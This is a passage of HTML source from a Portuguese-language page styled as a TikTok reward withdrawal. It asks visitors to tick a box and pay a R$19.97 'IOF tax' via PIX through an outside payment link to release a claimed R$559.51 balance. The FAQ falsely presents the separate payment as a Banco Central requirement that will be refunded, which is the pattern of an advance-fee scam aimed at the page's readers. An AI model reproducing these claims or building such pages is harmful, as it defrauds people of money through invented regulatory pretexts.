1.055-.43 1.663-.43.549 0 1.182.059 1.704.414.617.413.735 1.14.735 1.966h-4.372c.017.877.304 1.654 1.958 1.654.785 0 1.519-.127 2.203-.245v.447c-.71.127-1.494.262-2.245.262m7.911-3.755a5.112 5.112 0 0 0 -1.722-.288c-1.476 0-2.177.499-2.177 1.798 0 1.232.574 1.772 1.687 1.772.667 0 1.444-.16 2.212-.33zm.093 3.637-.042-.254c-.684.16-1.63.372-2.305.372-.548 0-1.071-.076-1.51-.439-.507-.414-.667-1.08-.667-1.806 0-.76.253-1.477.945-1.865.481-.279 1.131-.388 1.722-.388.59 0 1.165.101 1.764.27v-1.95h.498v6.06zm7.706-3.907c-.667 0-1.443.16-2.211.337v2.937c.54.202 1.14.296 1.722.296 1.476 0 2.177-.498 2.177-1.8 0-1.222-.574-1.77-1.688-1.77m1.274 3.645c-.48.27-1.13.38-1.713.38a6.07 6.07 0 0 1 -1.907-.32l-.026.202h-.338v-6.06h.499v2.034c.683-.151 1.603-.354 2.253-.354.55 0 1.072.084 1.51.438.507.415.667 1.08.667 1.806 0 .76-.253 1.478-.945 1.874m1.606 1.899v-.464c.245.025.473.043.634.043.616 0 .987-.178 1.333-.879l.16-.337-2.228-4.262h.574l1.908 3.68h.033l1.815-3.68h.565l-2.397 4.785c-.438.87-.911 1.156-1.78 1.156-.195 0-.405-.016-.617-.042m11.657-4.067h-1.654v1.494h1.662c1.14 0 1.57-.128 1.57-.752 0-.667-.59-.743-1.578-.743m-.303-2.422h-1.35v1.519h1.358c1.122 0 1.57-.135 1.57-.768 0-.674-.566-.751-1.578-.751m2.565 4.448c-.608.388-1.342.405-2.684.405h-2.523v-5.781h2.464c1.156 0 1.865.016 2.456.371.422.254.59.642.59 1.148 0 .607-.252 1.013-.911 1.283v.033c.743.17 1.224.55 1.224 1.368 0 .557-.202.92-.616 1.173m5.665-1.385a17.866 17.866 0 0 0 -1.536-.067c-.87 0-1.174.178-1.174.574 0 .371.254.574.92.574.557 0 1.224-.126 1.79-.254zm.253 1.79-.034-.254c-.726.178-1.57.372-2.312.372-.457 0-.946-.06-1.292-.313-.32-.227-.472-.599-.472-1.029 0-.482.21-.929.717-1.156.447-.211 1.047-.228 1.595-.228.447 0 1.046.025 1.545.06v-.077c0-.667-.44-.886-1.638-.886-.464 0-1.03.025-1.57.075v-.86c.6-.05 1.275-.084 1.832-.084.742 0 1.511.059 1.983.396.49.347.583.828.583 1.46v2.524zm6.501 0v-2.355c0-.776-.396-1.055-1.106-1.055-.522 0-1.18.135-1.738.27v3.14h-1.19v-4.262h.97l.043.27c.75-.194 1.587-.388 2.279-.388.523 0 1.055.075 1.46.439.337.304.464.725.464 1.333v2.608zm4.544.118c-.549 0-1.149-.076-1.587-.447-.523-.422-.675-1.089-.675-1.807 0-.675.22-1.409.869-1.822.532-.347 1.19-.422 1.874-.422.49 0 .97.034 1.502.084v.911c-.431-.041-.946-.075-1.359-.075-1.131 0-1.662.355-1.662 1.333 0 .92.396 1.317 1.324 1.317.54 0 1.174-.102 1.79-.22v.878c-.667.135-1.393.27-2.076.27m5.59-3.604c-1.13 0-1.628.355-1.628 1.325 0 .971.49 1.385 1.629 1.385 1.122 0 1.611-.347 1.611-1.317 0-.971-.48-1.393-1.611-1.393m2.042 3.157c-.523.354-1.207.447-2.042.447-.853 0-1.536-.102-2.05-.447-.592-.388-.803-1.03-.803-1.798s.211-1.418.802-1.806c.515-.346 1.198-.447 2.05-.447.845 0 1.52.101 2.043.447.59.388.793 1.038.793 1.797 0 .769-.21 1.419-.793 1.807m7.664.447c-.717 0-1.494-.118-2.076-.6-.692-.573-.903-1.46-.903-2.414 0-.851.27-1.864 1.173-2.455.7-.455 1.57-.548 2.447-.548.642 0 1.3.042 2.018.101v1.038a26.08 26.08 0 0 0 -1.967-.093c-1.646 0-2.346.625-2.346 1.957 0 1.36.65 1.968 1.865 1.968.793 0 1.68-.16 2.574-.347v1.03c-.895.178-1.832.363-2.785.363m6.282-3.738c-.988 0-1.368.354-1.444 1.004h2.87c-.034-.692-.44-1.005-1.426-1.005m-.178 3.739c-.7 0-1.333-.084-1.806-.473-.506-.421-.684-1.055-.684-1.78 0-.65.212-1.376.803-1.798.522-.371 1.19-.447 1.865-.447.607 0 1.325.067 1.848.43.684.481.743 1.224.75 2.102h-4.05c.025.65.371 1.072 1.57 1.072.742 0 1.57-.11 2.27-.22v.836c-.819.135-1.713.278-2.566.278m8.071-.118v-2.355c0-.776-.396-1.055-1.105-1.055-.524 0-1.181.135-1.739.27v3.14h-1.19v-4.262h.97l.043.27c.75-.194 1.587-.388 2.279-.388.523 0 1.055.075 1.46.439.337.304.464.725.464 1.333v2.608zm4.569.118c-.574 0-1.097-.16-1.384-.608-.21-.304-.312-.716-.312-1.29v-1.596h-.861v-.886h.86l.128-1.292h1.054v1.292h1.68v.886h-1.68v1.367c0 .33.025.608.118.81.127.287.405.397.777.397.278 0 .616-.042.852-.084v.852c-.388.076-.836.152-1.232.152m2.326-.118v-4.262h.97l.043.27c.785-.22 1.367-.388 2.11-.388.033 0 .084 0 .151.008v1.013c-.135-.008-.295-.008-.413-.008-.583 0-1.021.067-1.672.22v3.147zm7.6-1.79a17.86 17.86 0 0 0 -1.536-.067c-.869 0-1.173.178-1.173.574 0 .371.253.574.92.574.557 0 1.224-.126 1.79-.254zm.253 1.79-.033-.254c-.726.178-1.57.372-2.313.372-.456 0-.945-.06-1.291-.313-.32-.227-.473-.599-.473-1.029 0-.482.212-.929.718-1.156.447-.211 1.046-.228 1.595-.228.447 0 1.046.025 1.544.06v-.077c0-.667-.439-.886-1.637-.886-.464 0-1.03.025-1.57.075v-.86c.599-.05 1.275-.084 1.832-.084.742 0 1.51.059 1.983.396.49.347.582.828.582 1.46v2.524zm2.468-6.06h1.19v6.06h-1.19z" fill="#939598"></path></svg>			</div>
		</div>
						</div>
				</div>
				</div>
		<div class="elementor-element elementor-element-7b3d2353 e-con-full e-flex e-con e-child" data-id="7b3d2353" data-element_type="container">
				<div class="elementor-element elementor-element-3bb7e6d0 elementor-widget elementor-widget-heading" data-id="3bb7e6d0" data-element_type="widget" data-widget_type="heading.default">
				<div class="elementor-widget-container">
					<h2 class="elementor-heading-title elementor-size-default">Método de pagamento​</h2>				</div>
				</div>
				</div>
		<div class="elementor-element elementor-element-32186d3 e-con-full e-flex e-con e-child" data-id="32186d3" data-element_type="container">
				<div class="elementor-element elementor-element-41276ae8 elementor-widget-divider--view-line elementor-widget elementor-widget-divider" data-id="41276ae8" data-element_type="widget" data-widget_type="divider.default">
				<div class="elementor-widget-container">
							<div class="elementor-divider">
			<span class="elementor-divider-separator">
						</span>
		</div>
						</div>
				</div>
				</div>
		<div class="elementor-element elementor-element-1f544f37 e-con-full e-flex e-con e-child" data-id="1f544f37" data-element_type="container">
				<div class="elementor-element elementor-element-27e8c9fe elementor-widget-mobile__width-initial elementor-view-default elementor-widget elementor-widget-icon" data-id="27e8c9fe" data-element_type="widget" data-widget_type="icon.default">
				<div class="elementor-widget-container">
							<div class="elementor-icon-wrapper">
			<div class="elementor-icon">
			<svg aria-hidden="true" class="e-font-icon-svg e-fas-exclamation-circle" viewBox="0 0 512 512" xmlns="http://www.w3.org/2000/svg"><path d="M504 256c0 136.997-111.043 248-248 248S8 392.997 8 256C8 119.083 119.043 8 256 8s248 111.083 248 248zm-248 50c-25.405 0-46 20.595-46 46s20.595 46 46 46 46-20.595 46-46-20.595-46-46-46zm-43.673-165.346l7.418 136c.347 6.364 5.609 11.346 11.982 11.346h48.546c6.373 0 11.635-4.982 11.982-11.346l7.418-136c.375-6.874-5.098-12.654-11.982-12.654h-63.383c-6.884 0-12.356 5.78-11.981 12.654z"></path></svg>			</div>
		</div>
						</div>
				</div>
				<div class="elementor-element elementor-element-5512d081 elementor-widget elementor-widget-heading" data-id="5512d081" data-element_type="widget" data-widget_type="heading.default">
				<div class="elementor-widget-container">
					<h2 class="elementor-heading-title elementor-size-default">Pague com PIX! Os pagamentos são simples, práticos e realizados em segundos.</h2>				</div>
				</div>
				</div>
				</div>
					</div>
				</div>
					</div>
				</div>
		<div class="elementor-element elementor-element-74f7af7a e-flex e-con-boxed e-con e-child" data-id="74f7af7a" data-element_type="container">
					<div class="e-con-inner">
				<div class="elementor-element elementor-element-6c4959bf elementor-widget__width-inherit elementor-widget-mobile__width-inherit elementor-widget elementor-widget-html" data-id="6c4959bf" data-element_type="widget" data-widget_type="html.default">
				<div class="elementor-widget-container">
					<div class="elementor-element elementor-element-1b830120 elementor-widget elementor-widget-html" data-id="1b830120" data-element_type="widget" data-widget_type="html.default">
  <div class="elementor-widget-container">
    <!-- Adicione o link para carregar a fonte Inter -->
    <link href="https://fonts.googleapis.com/css2?family=Inter:wght@400;600&display=swap" rel="stylesheet">

    <style>
      .checkbox-container {
        display: flex;
        align-items: center;
        justify-content: center;
        margin-top: 20px;
      }

      .checkbox-container label {
        display: flex;
        align-items: center;
        font-family: 'Inter', sans-serif;
        font-size: 12px;
        font-weight: 400;
        color: #535862;
        line-height: 1.4;
      }

      .checkbox-container input[type="checkbox"] {
        margin-right: 10px;
      }

      .btn33 {
        background: #003772;
        border-radius: 4px;
        color: #fff;
        font-family: 'Inter', sans-serif;
        font-size: 16px;
        font-weight: 600;
        padding: 18px 16px;
        border: none;
        text-decoration: none;
        display: block;
        text-align: center;
        margin-top: 20px;
        cursor: not-allowed;
        opacity: 0.5;
        transition: opacity 0.3s ease, cursor 0.3s ease;
        pointer-events: none; /* Inicia desabilitado */
      }

      .btn33.enabled {
        cursor: pointer;
        opacity: 1;
        pointer-events: auto; /* Permitir clique quando habilitado */
      }
    </style>

    <div class="checkbox-container">
      <label>
        <input type="checkbox" id="termsCheckbox" onchange="toggleButton()">
        Concordo com os termos, incluindo pagar o Imposto sobre Operações Financeiras (IOF), necessário para completar o saque em conformidade com as regulamentações vigentes.
      </label>
    </div>

    <a id="paymentButton" href="#" class="btn33" data-enabled="false" style="pointer-events: none; opacity: 0.5;">Pagar Imposto</a>

    <script>
      const zippifyBaseUrl = "https://go.disruptybr.com.br/7ebdrvkhxb";

      function getParams() {
        const urlParams = new URLSearchParams(window.location.search);
        const utmParams = [
          "utm_source",
          "utm_medium",
          "utm_campaign",
          "utm_term",
          "utm_content",
        ];

        return utmParams
          .map(param => {
            const value = urlParams.get(param);
            return value ? `${param}=${value}` : null;
          })
          .filter(Boolean)
          .join("&");
      }

      function updateButtonLink() {
        const button = document.getElementById("paymentButton");
        const queryParams = getParams();
        const finalUrl = queryParams
          ? `${zippifyBaseUrl}?${queryParams}`
          : zippifyBaseUrl;

        button.setAttribute("href", finalUrl);
      }

      function toggleButton() {
        const checkbox = document.getElementById("termsCheckbox");
        const button = document.getElementById("paymentButton");

        if (checkbox.checked) {
          button.classList.add("enabled");
          button.setAttribute("data-enabled", "true");
          button.style.pointerEvents = "auto"; // Permitir clique
          button.style.opacity = "1"; // Tornar visível
          updateButtonLink(); // Atualizar o link ao ativar o botão
        } else {
          button.classList.remove("enabled");
          button.setAttribute("data-enabled", "false");
          button.style.pointerEvents = "none"; // Desabilitar clique
          button.style.opacity = "0.5"; // Tornar opaco
          button.setAttribute("href", "#"); // Remover link
        }
      }

      document.getElementById("paymentButton").addEventListener("click", function (event) {
        const isEnabled = this.getAttribute("data-enabled") === "true";

        if (!isEnabled) {
          event.preventDefault();
          alert("Você precisa aceitar os termos antes de prosseguir.");
        }
      });

      // Garante que o botão inicie no estado correto ao carregar a página
      document.addEventListener("DOMContentLoaded", function () {
        toggleButton(); // Configura o botão corretamente no carregamento
      });
    </script>
  </div>
</div>
				</div>
				</div>
					</div>
				</div>
				</div>
				</div>
				
				<div class="faq-section">
  <h2 class="faq-title">Dúvidas Frequentes</h2>
  <div class="faq-item">
    <button class="faq-question" onclick="toggleFAQ(this)">Por que o IOF de R$19.97 não é descontado do saldo acumulado de R$559.51?</button>
    <div class="faq-answer">
      <p>Conforme determinação do <strong>Banco Central</strong>, o pagamento do <strong>(IOF)</strong> deve ser realizado separadamente para validar a identidade do beneficiário e <strong>evitar fraudes.</strong> O valor será reembolsado junto ao saldo acumulado após a confirmação.</p>
    </div>
  </div>
  <div class="faq-item">
    <button class="faq-question" onclick="toggleFAQ(this)">Como realizar o pagamento do (IOF)?</button>
    <div class="faq-answer">
      <p>Clique no botão <strong>'Pagar Imposto'</strong> e siga as instruções para realizar o pagamento via PIX. O processo é rápido e seguro.</p>
    </div>
  </div>
  
  <div class="faq-item">
    <button class="faq-question" onclick="toggleFAQ(this)"><strong>NÃO</strong> consigo clicar no botão de <strong>'Pagar Imposto'</strong>. O que devo fazer?</button>
    <div class="faq-answer">
      <p>Certifique-se de ter marcado a opção de <strong>"Concordo com os termos e condições"</strong>, localizado logo <strong>acima do botão.</strong> Após isso, o botão será <strong>habilitado automaticamente.</strong></p>
    </div>
  </div>
  
</div>

<script>
  function toggleFAQ(button) {
    const answer = button.nextElementSibling;
    const isOpen = answer.style.display === "block";
    document.querySelectorAll(".faq-answer").forEach(el => el.style.display = "none"); // Fecha outras
    answer.style.display = isOpen ? "none" : "block"; // Abre ou fecha o atual
  }
</script>



					<script type="text/javascript">
				const lazyloadRunObserver = () => {
					const lazyloadBackgrounds = document.querySelectorAll( `.e-con.e-parent:not(.e-lazyloaded)` );
					const lazyloadBackgroundObserver = new IntersectionObserver( ( entries ) => {
						entries.forEach( ( entry ) => {
							if ( entry.isIntersecting ) {
								let lazyloadBackground = entry.target;
								if( lazyloadBackground ) {
									lazyloadBackground.classList.add( 'e-lazyloaded' );
								}
								lazyloadBackgroundObserver.unobserve( entry.target );
							}
						});
					}, { rootMargin: '200px 0px 200px 0px' } );
					lazyloadBackgrounds.forEach( ( lazyloadBackground ) => {
						lazyloadBackgroundObserver.observe( lazyloadBackground );
					} );
				};
				const events = [
					'DOMContentLoaded',
					'elementor/lazyload/observe',
				];
				events.forEach( ( event ) => {
					document.addEventListener( event, lazyloadRunObserver );
				} );
			</script>
			<script id="wp-block-template-skip-link-js-after">
	( function() {
		var skipLinkTarget = document.querySelector( 'main' ),
			sibling,
			skipLinkTargetID,
			skipLink;

		// Early exit if a skip-link target can't be located.
		if ( ! skipLinkTarget ) {
			return;
		}

		/*
		 * Get the site wrapper.
		 * The skip-link will be injected in the beginning of it.
		 */
		sibling = document.querySelector( '.wp-site-blocks' );

		// Early exit if the root element was not found.
		if ( ! sibling ) {
			return;
		}

		// Get the skip-link target's ID, and generate one if it doesn't exist.
		skipLinkTargetID = skipLinkTarget.id;
		if ( ! skipLinkTargetID ) {
			skipLinkTargetID = 'wp--skip-link--target';
			skipLinkTarget.id = skipLinkTargetID;
		}

		// Create the skip link.
		skipLink = document.createElement( 'a' );
		skipLink.classList.add( 'skip-link', 'screen-reader-text' );
		skipLink.href = '#' + skipLinkTargetID;
		skipLink.innerHTML = 'Pular para o conteúdo';

		// Inject the skip link.
		sibling.parentElement.insertBefore( skipLink, sibling );
	}() );
	
</script>
<script src="js/webpack-pro.runtime.min.js" id="elementor-pro-webpack-runtime-js"></script>
<script src="js/webpack.runtime.min.js" id="elementor-webpack-runtime-js"></script>
<script src="js/jquery.min.js" id="jquery-core-js"></script>
<script src="js/jquery-migrate.min.js" id="jquery-migrate-js"></script>
<script src="js/frontend-modules.min.js" id="elementor-frontend-modules-js"></script>
<script src="js/hooks.min.js" id="wp-hooks-js"></script>
<script src="js/i18n.min.js" id="wp-i18n-js"></script>
<script id="wp-i18n-js-after">
wp.i18n.setLocaleData( { 'text direction\u0004ltr': [ 'ltr' ] } );
</script>
<script id="elementor-pro-frontend-js-before">
var ElementorProFrontendConfig = {"ajaxurl":"https:\/\/respostaspremiadas.com\/wp-admin\/admin-ajax.php","nonce":"e524d23892","urls":{"assets":"https:\/\/respostaspremiadas.com\/wp-content\/plugins\/elementor-pro\/assets\/","rest":"https:\/\/respostaspremiadas.com\/wp-json\/"},"settings":{"lazy_load_background_images":true},"popup":{"hasPopUps":false},"shareButtonsNetworks":{"facebook":{"title":"Facebook","has_counter":true},"twitter":{"title":"Twitter"},"linkedin":{"title":"LinkedIn","has_counter":true},"pinterest":{"title":"Pinterest","has_counter":true},"reddit":{"title":"Reddit","has_counter":true},"vk":{"title":"VK","has_counter":true},"odnoklassniki":{"title":"OK","has_counter":true},"tumblr":{"title":"Tumblr"},"digg":{"title":"Digg"},"skype":{"title":"Skype"},"stumbleupon":{"title":"StumbleUpon","has_counter":true},"mix":{"title":"Mix"},"telegram":{"title":"Telegram"},"pocket":{"title":"Pocket","has_counter":true},"xing":{"title":"XING","has_counter":true},"whatsapp":{"title":"WhatsApp"},"email":{"title":"Email"},"print":{"title":"Print"},"x-twitter":{"title":"X"},"threads":{"title":"Threads"}},"facebook_sdk":{"lang":"pt_BR","app_id":""},"lottie":{"defaultAnimationUrl":"https:\/\/respostaspremiadas.com\/wp-content\/plugins\/elementor-pro\/modules\/lottie\/assets\/animations\/default.json"}};
</script>
<script src="js/frontend.min.js" id="elementor-pro-frontend-js"></script>
<script src="js/core.min.js" id="jquery-ui-core-js"></script>
<script id="elementor-frontend-js-before">
var elementorFrontendConfig = {"environmentMode":{"edit":false,"wpPreview":false,"isScriptDebug":false},"i18n":{"shareOnFacebook":"Compartilhar no Facebook","shareOnTwitter":"Compartilhar no Twitter","pinIt":"Fixar","download":"Baixar","downloadImage":"Baixar imagem","fullscreen":"Tela cheia","zoom":"Zoom","share":"Compartilhar","playVideo":"Reproduzir v\u00eddeo","previous":"Anterior","next":"Pr\u00f3ximo","close":"Fechar","a11yCarouselPrevSlideMessage":"Slide anterior","a11yCarouselNextSlideMessage":"Pr\u00f3ximo slide","a11yCarouselFirstSlideMessage":"Este \u00e9 o primeiro slide","a11yCarouselLastSlideMessage":"Este \u00e9 o \u00faltimo slide","a11yCarouselPaginationBulletMessage":"Ir para o slide"},"is_rtl":false,"breakpoints":{"xs":0,"sm":480,"md":768,"lg":1025,"xl":1440,"xxl":1600},"responsive":{"breakpoints":{"mobile":{"label":"Dispositivos m\u00f3veis no modo retrato","value":767,"default_value":767,"direction":"max","is_enabled":true},"mobile_extra":{"label":"Dispositivos m\u00f3veis no modo paisagem","value":880,"default_value":880,"direction":"max","is_enabled":false},"tablet":{"label":"Tablet no modo retrato","value":1024,"default_value":1024,"direction":"max","is_enabled":true},"tablet_extra":{"label":"Tablet no modo paisagem","value":1200,"default_value":1200,"direction":"max","is_enabled":false},"laptop":{"label":"Notebook","value":1366,"default_value":1366,"direction":"max","is_enabled":false},"widescreen":{"label":"Tela ampla (widescreen)","value":2400,"default_value":2400,"direction":"min","is_enabled":false}},"hasCustomBreakpoints":false},"version":"3.26.3","is_static":false,"experimentalFeatures":{"e_font_icon_svg":true,"additional_custom_breakpoints":true,"container":true,"e_swiper_latest":true,"e_nested_atomic_repeaters":true,"e_onboarding":true,"e_css_smooth_scroll":true,"theme_builder_v2":true,"home_screen":true,"nested-elements":true,"editor_v2":true,"e_element_cache":true,"link-in-bio":true,"floating-buttons":true,"launchpad-checklist":true},"urls":{"assets":"https:\/\/respostaspremiadas.com\/wp-content\/plugins\/elementor\/assets\/","ajaxurl":"https:\/\/respostaspremiadas.com\/wp-admin\/admin-ajax.php","uploadUrl":"https:\/\/respostaspremiadas.com\/wp-content\/uploads"},"nonces":{"floatingButtonsClickTracking":"cf931778b6"},"swiperClass":"swiper","settings":{"page":[],"editorPreferences":[]},"kit":{"active_breakpoints":["viewport_mobile","viewport_tablet"],"global_image_lightbox":"yes","lightbox_enable_counter":"yes","lightbox_enable_fullscreen":"yes","lightbox_enable_zoom":"yes","lightbox_enable_share":"yes","lightbox_title_src":"title","lightbox_description_src":"description"},"post":{"id":200,"title":"tiktokiof%20%E2%80%93%20Tiktok","excerpt":"","featuredImage":false}};
</script>
<script src="js/frontend.min_1.js" id="elementor-frontend-js"></script>
<script src="js/elements-handlers.min.js" id="pro-elements-handlers-js"></script>
	



</body></html><!-- Page cached by LiteSpeed Cache 6.5.4 on 2025-01-06 05:53:40 -->